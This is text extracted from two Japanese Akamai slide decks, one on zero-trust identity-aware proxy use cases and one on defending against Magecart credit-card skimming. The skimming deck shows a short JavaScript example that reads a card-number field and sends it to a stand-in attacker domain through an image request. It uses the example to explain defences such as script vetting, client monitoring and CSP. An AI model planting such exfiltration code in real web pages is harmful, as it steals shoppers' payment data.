Upload
others
View
2
Download
0
Embed Size (px)
Citation preview
© 2019 Akamai | Confidential1
ID認識型プロキシ(IAP)ユースケース
アカマイ・テクノロジーズ合同会社マーケティング本部
© 2019 Akamai | Confidential
アプリ #2
アプリ #1
アプリ #3
ユーザーとデバイスが境界の外に移動
働き方改革グローバル化
分散するリソース、崩壊する境界型セキュリティ
アプリ#1
アプリ#2
アプリ#3
脅威が境界の内側に侵入
マルウェアの潜在&攻撃の高度化
Office365
Salesforce
アプリ#2
アプリ#1
アプリ#3
アプリケーションとデータも外に移動
クラウドシフトSaaS/IaaSの利用
Office365
Salesforce
© 2019 Akamai | Confidential
ゼロトラストセキュリティのフレームワーク
https://go.forrester.com/blogs/what-ztx-means-for-vendors-and-users/
■ポイント1. ネットワークの内外を区別しない
2. どこからのアクセスであっても認証認可を求める
3. ユーザ/デバイスに応じたアプリ、データを最小権限許可
4. 振る舞いやログを常時モニタリングし対策を自動化する
ゼロトラストセキュリティ実装の一例ID認識型プロキシ
ID認識型プロキシ認証(多要素)認可シングルサインオン
データセンター
Apps/OS
AD/LDAP
IaaSAD/
LDAP
SaaS
IdP(e.g.Okta, OneLogin)
②セキュリティチェック
③セキュアアクセス
リモートワーカー
営業部社員
財務経理部社員
協力会社社員
①接続要求
マルチクラウド環境を想定
ID認識型プロキシの主要な4つのユースケース
VPNリスクからの脱却
クラウドへのセキュアアクセス サプライチェーン合併買収
大手製造業様
導入製品:EAA(IAP)課題 ITモダン化
オンプレ型アクセス基盤から脱却 レガシーアプリをインターネット経由 数百のサプライチェーン向けアプリ
働き方改革 従業員がどこでもセキュアに働ける環境 セキュリティとユーザビリティの最大化 インフラ・セキュリティのシンプル化
代理店、営業拠点、生産拠点合わせて10万人以上 拠点数: 国内外数百箇所 世界150カ国以上で活動 デジタルトランスフォーメーションが経営課題
既存のアーキテクチャ
RProxy
Internet Firewall
MPLS#1
MPLS#2
MPLS#3
Router
Router
Router
Data Center
Firewall
DCNWSpineRouterRouter
RouterRouter
RouterRouter
RouterRouter
App#1
App#1
App#1
App#A
App#B
DCNWLB
DCNWSpineDCNWLeaf
VPN
Multiple corporate WANs by M&A
SaaSIaaS
サプライチェーン
社員(M&A)
リモートワーカー
既存のアーキテクチャ
RProxy
Internet Firewall
MPLS#1
MPLS#2
MPLS#3
Router
Router
Router
Data Center
Firewall
DCNWSpineRouterRouter
RouterRouter
RouterRouter
RouterRouter
App#1
App#1
App#1
App#A
App#B
DCNWLB
DCNWSpineDCNWLeaf
VPN
Multiple corporate WANs by M&A
SaaSIaaS
リモートワーカー
社員(M&A)
オンプレミスの管理負荷
クラウドへのセキュアアクセス
クラウドに移行したトラフィックを境界型セキュリティで接続するのは、複雑かつ高コストとなる。クラウドごとに異なるネットワーク接続とID管理の分散により、非効率とセキュリティリスクが発生する。
Icewall
Internet Firewall
MPLS#1
MPLS#2
MPLS#3
Router
Router
Router
Data Center
Firewall
DCNWSpineRouterRouter
RouterRouter
RouterRouter
RouterRouter
App#1
App#1
App#1
App#A
App#B
DCNWLB
DCNWSpineDCNWLeaf
VPNSaaSIaaS
EAA Con
IAPCon
IAPCon
IAP
リモートワーカー
社員(M&A)
オンプレミスの管理負荷
クラウドへのセキュアアクセス
拠点から直接ブレークアウトし、IAPを通してあらゆるアプリへのアクセス管理を実施。SaaSに対するID統合管理と、IaaSへのセキュアなネットワーキングをシンプルに実現。
IAPによるゼロトラストアクセス
既存のアーキテクチャ
RProxy
Internet Firewall
MPLS#1
MPLS#2
MPLS#3
Router
Router
Router
Data Center
Firewall
DCNWSpineRouterRouter
RouterRouter
RouterRouter
RouterRouter
App#1
App#1
App#1
App#A
App#B
DCNWLB
DCNWSpineDCNWLeaf
VPN
Multiple corporate WANs by M&A
SaaSIaaS
社員(M&A)
オンプレミスの管理負荷
合併&買収
企業のシステム統合を通して、複雑化するネットワークとセキュリティ。複数のネットワークセキュリティコンポーネントとIDの統合により、設計が極めて複雑化する。
Icewall
Internet Firewall
MPLS#1
MPLS#2
MPLS#3
Router
Router
Router
Data Center
Firewall
DCNWSpineRouterRouter
RouterRouter
RouterRouter
RouterRouter
App#1
App#1
App#1
App#A
App#B
DCNWLB
DCNWSpineDCNWLeaf
VPNSaaSIaaS
EAA Con
EAA Con
IAPCon
IAP
オンプレミスの管理負荷
合併&買収
オンプレ、SaaS、IaaSへのアクセスを全てIAP経由に統合。一元的に管理されるIDとネットワーキングの統合。買収前後の組織における複雑な認可管理に対してIAPを単一の執行ポイントに出来る。
IAPによるゼロトラストアクセス
社員(M&A)
既存のアーキテクチャ
RProxy
Internet Firewall
MPLS#1
MPLS#2
MPLS#3
Router
Router
Router
Data Center
Firewall
DCNWSpineRouterRouter
RouterRouter
RouterRouter
RouterRouter
App#1
App#1
App#1
App#A
App#B
DCNWLB
DCNWSpineDCNWLeaf
VPN
Multiple corporate WANs by M&A
SaaSIaaS
リモートワーカー
オンプレミスの管理負荷
VPNリスクからの脱却
信頼をベースにネットワークレベルの接続を行うVPNは、セキュリティ設計が複雑となる。加えて、SaaS/IaaSへのアクセスが増加すると、自社DCへアクセスするトラフィックは、コスト負担となる。
Icewall
Internet Firewall
MPLS#1
MPLS#2
MPLS#3
Router
Router
Router
Data Center
Firewall
DCNWSpineRouterRouter
RouterRouter
RouterRouter
RouterRouter
App#1
App#1
App#1
App#A
App#B
DCNWLB
DCNWSpineDCNWLeaf
VPNSaaSIaaS
EAA Con
IAPCon
IAPCon
IAP
リモートワーカー
社員(M&A)
IAPによるゼロトラストアクセス
オンプレミスの管理負荷
VPNリスクからの脱却
リモートワーカーからのアクセスにもVPNは使わず、認証&認可を用いたセキュアアクセス。SaaS、IaaSへのアクセスは自社境界を通らず効率的なクラウドIAP経由でのアクセス。
既存のアーキテクチャ
RProxy
Internet Firewall
MPLS#1
MPLS#2
MPLS#3
Router
Router
Router
Data Center
Firewall
DCNWSpineRouterRouter
RouterRouter
RouterRouter
RouterRouter
App#1
App#1
App#1
App#A
App#B
DCNWLB
DCNWSpineDCNWLeaf
VPN
Multiple corporate WANs by M&A
SaaS
サプライチェーン
オンプレミスの管理負荷
サプライチェーン
システムへのアクセスを許可する際に、適切な認可管理を行う事が必要。NWベースのアプローチでは、IDとの紐づけが困難であり、大きなセキュリティインシデントに繋がった事例もある。
IAPによるゼロトラストアクセス
Icewall
Internet Firewall
MPLS#1
MPLS#2
MPLS#3
Router
Router
Router
Data Center
Firewall
DCNWSpineRouterRouter
RouterRouter
RouterRouter
RouterRouter
App#1
App#1
App#1
App#A
App#B
DCNWLB
DCNWSpineDCNWLeaf
VPNSaaS
EAA Con
IAPCon
IAPCon
IAP
サプライチェーン
オンプレミスの管理負荷
サプライチェーン
サプライチェーンからのアクセスを「必要なものだけに」の最小権限認可制御。統合ID管理と連携し、シンプルなアクセス制御とネットワーキングを実現。
既存のアーキテクチャ
RProxy
Internet Firewall
MPLS#1
MPLS#2
MPLS#3
Router
Router
Router
Data Center
Firewall
DCNWSpineRouterRouter
RouterRouter
RouterRouter
RouterRouter
App#1
App#1
App#1
App#A
App#B
DCNWLB
DCNWSpineDCNWLeaf
VPN
Multiple corporate WANs by M&A
SaaS
オンプレミスの管理負荷
トロンボーンルーティング VPNによるセキュリティリスク
SaaSによるオーバーサブスクリプション 複雑なネットワーク 増加するMPLSコスト
冗長なID管理 システムごとの認証システム 信頼ベースの認可なしアクセス
社員(M&A)
リモートワーカー
サプライチェーン
IAPによるゼロトラストアクセス
Icewall
Internet Firewall
MPLS#1
MPLS#2
MPLS#3
Router
Router
Router
Data Center
Firewall
DCNWSpineRouterRouter
RouterRouter
RouterRouter
RouterRouter
App#1
App#1
App#1
App#A
App#B
DCNWLB
DCNWSpineDCNWLeaf
VPNSaaS
EAA Con
EAA Con
EAA Con
ゼロトラストベースの認証認可 IDの一元的な管理 分散したアプリケーションへのSSO IAAAとネットワークの一元管理 デバイスリスク適応型セキュリティ
EAA
社員(M&A)
リモートワーカー
サプライチェーン
ゼロトラストへの 8 つの段階
アプリケーション事前確認
アクセスプロキシ準備
テストラボ登録
セキュリティ向上
パフォーマンス向上
外部ユーザー登録
内部ユーザー登録
VLAN 移行
1 2 3 4 5 6 7 8
ゼロトラストへの 8 つの段階Akamai CTO の Charlie Gero によるゼロトラストへの包括的ガイドおよびロードマップ
ゼロトラスト・リファレンス・アーキテクチャ一般的な環境でゼロトラストを適用する方法についての簡単なビジュアルガイド
https://www.akamai.com/jp/ja/solutions/security/zero-trust-security-model.jsp
境界セキュリティを超える対策リスク低減のための包括的かつ実現可能なロードマップ
ありがとうございました。
https://www.linkedin.com/in/haru-kaneko-b709aa61/
Magecartやクレジットカードスキミングなど、標的を絞ったクライアントサイドアタックに対する防御方法
バンダリ・ハレンドラセキュリティ・プロダクト・マネージャ
クレジットカードスキミング攻撃の急増
British Airways: 35万以上のカード情報流出TicketMaster:4万以上のカード情報流出
Source:zdhet
Source:threatpost
API
API
ウェブ・セキュリティの現状
API
API
API
API
ユーザーが分散
クラウドA クラウドB オンプレミス
{API}
ボット、API,DDoSなど様々な攻撃
アプリケーション(ウェブ、API)
WAF APIセキュリティ ボット・マネージメント DDoS防御
API
API
攻撃のAttack Surfaceが拡大中:ユーザーも対象
API
API
API
API
ユーザーが分散
クラウドA クラウドB オンプレミス
{API}
ボット、API,DDoSなど様々な攻撃
アプリケーション(ウェブ、API)
WAF APIセキュリティ ボット・マネージメント DDoS防御
3rd Partyサーバー
3rd Party Script
3rd Partyサーバーへ攻撃
ユーザーへの攻撃
3rd Partyスクリプトが多くSupply Chain攻撃が増加中
Third party and Supply-chain code
External Code and Open source libraries
Inhouse Code and libraries
6248
In-houseリソース平均数
3rd Partyリソース平均数
フォームジャッキング攻撃手法(MageCart)
API
API
攻撃者C&C
xxxxxxxxxxxxxxxxxxx
クレジット・カード番号
決済
ユーザー
3rd Partyスクリプト
オリジン・サーバ
1.3rd Partyスクリプトやオリジンのスクリプトの改ざん
2.改ざんされたスクリプト含まれたアプリケーションをユーザーへ配信
3.ユーザーが決済ページにカード情報の入力
4.入力されたカード情報が直接攻撃者のC&Cサーバーへ送信
ブラウザーからデータ流出仕組み
xxxxxxxxxxxxxxxxxxx
クレジット・カード番号
決済
ウェブ・ブラウザー
XHR, WebSocket, Image作成、Iframeなど、外部と通信できる各手法
www.attackercc.com
新規画像作成を使った攻撃の例
ステップ1:カード番号をフィルドから読み込むvar credit_card_number=$("#credit_card_field").val();
ステップ2:新規画像オブジェクトの作成var image=new Image();
ステップ3:カード番号が含まれるURLの作成(ドメインは攻撃者のドメイン)var exfiltration_link="https://www.attackercc.com/"+credit_card_number;
ステップ4:攻撃者のサーバへカード情報の送信image.src=exfiltration_link;
British Airwaysへの攻撃に使われた手法(XHR)
フォームからカード情報の流出
XHR (XMLHttpRequest) or Ajax を利用しデータの流出
クライアント(ブラウザ)への攻撃の検知と防御
1.開発プロセスの改善
2.クライアント側のモニタリング
3.Content Security Policy(CSP)による防御
防御策1:開発プロセスの改善
1.アプリケーションに含まれるスクリプトの事前検証
2.信頼されたホストよりスクリプトの配信
3.セキュリティ・テスト
スクリプト配信する前にスクリプトのダウンロード・ソース、作成者などを事前に確認を行う必要があります。
特ににトランザクション・ページなどに絞られたドメインより配信することでリスクの低減可能
リリース前にペネトレーション・テストやSAST(Static Application Security Testing)特を行うことで改ざんされたスクリプトを検出することが可能。
防御策2:クライアント側のモニタリング
API
API
1. 各スクリプトの挙動監視例:ー xx.jsがcredit card情報アクセスしたー xx.jsが新規画像オブジェクト作成したー xx.jsが新規Iframe作成した
2. ブラウザーから外部への通信の監視例:ー xx.jsがXHRで不審なサーバーへアクセスしたー xx.jsが不審なサーバーへWebSocket通信開始した
xxxxxxxxxxxxxxxxxxx
クレジット・カード番号
決済
1.アプリ+監視ツール
2.監視ツールを利用しブラウザ側で情報収集
3.監視ツールによる収集された情報をオリジンへ送信
アプリケーション・サーバー
監視ツール:監視ツールはアプリケーションに組み込まれるツール。JavaScript形式の
ツールが多く使われています。動的に遮断可能なツールも存在します。
4.監視ツールによる収集された情報の分析し不正アクセスの検出
防御策3:Content Security Policy (CSP)による防御CSPによる防御
Source: Mozilla (https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP)
以下のような設定することで信頼されているドメイン(Whitelist)へしかブラウザから通信されない。
コンテンツセキュリティポリシー (CSP) は、クロスサイトスクリプティング (XSS) やデータイン
ジェクション攻撃などのような、特定の種類の攻撃を検知し、影響を軽減するために追加できるセキュリティレイヤーです。これらの攻撃はデータの窃取からサイトの改ざん、マルウェアの拡散に至るまで、様々な目的に用いられます。
© 2019 Akamai | Confidential32
Thank you